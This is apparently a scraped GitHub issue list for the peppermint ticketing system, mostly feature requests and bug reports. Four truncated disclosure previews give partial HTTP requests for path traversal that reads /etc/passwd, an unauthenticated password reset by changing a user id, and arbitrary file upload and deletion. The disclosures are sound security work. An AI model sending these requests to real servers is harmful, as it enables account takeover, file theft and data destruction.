peppermint

peppermint copied to clipboard

fetch mails from imap and create a ticket

5

Hello, it would be really nice if peppermint can fetch mails from an imap-account and create tickets based on this

colttt

Vulnerability: Arbitrary File Download (unauthenticated)

1

The application allows users to download files. The `filepath` parameter is vulnerable to a path traversal resulting in reading/downloading arbitrary files from the server. ```http POST /api/v1/users/file/download?filepath=./../../../../../etc/passwd HTTP/1.1 Host: localhost:5000...

blockisec

The password reset endpoint (`/api/v1/users/resetpassword`) allows any unauthenticated user to change passwords of any other user by just incrementing the `id` JSON parameter. ``` POST /api/v1/users/resetpassword HTTP/1.1 Host: localhost:5000 Content-Length:...

blockisec

An attacker can upload files to any location on the server. The following request creates a text file in `/etc/hacked.txt`. ```http POST /api/v1/users/file/upload HTTP/1.1 Host: localhost:5000 Content-Length: 608 Pragma: no-cache...

blockisec

The application does not properly filter the `path` JSON parameter in the `/api/v1/users/file/delete` endpoint. This results in arbitrary file deletion. ``` DELETE /api/v1/users/file/delete HTTP/1.1 Host: localhost:5000 Content-Length: 57 Pragma: no-cache...

blockisec

Deletion of users/clients

3

I think it would be nice to be able to completely remove these entities when/if they are no longer needed. Thanks!

ChaseCares

CalDAV sync and customer database backend

1

I would like tools that embrace doing one thing well in the server realm, as they do on my computer. For that, the ticketing should only handle the tickets and,...

xeruf

Basic Email notifications support

5

Add support to sending when certain jobs are completed - Ticket Creation / Ticket completion - Client Creation - User Creation / User password reset from log in page /...

potts99

Few issues after an initial use

1

Safari browser user here. Adding a ticket and working on it results in ticket getting created. Still moving from sections will not result is changes being visible unless you do...

rusty1281

next-auth makes a request to BASE_URL for CSRF tokens, which may fail behind a loadbalancer

1

If you place peppermint behind some kind of loadbalancer or proxy where the BASE_URL might not be reachable from within the container, logins will fail with an error like this:...

mac-chaffee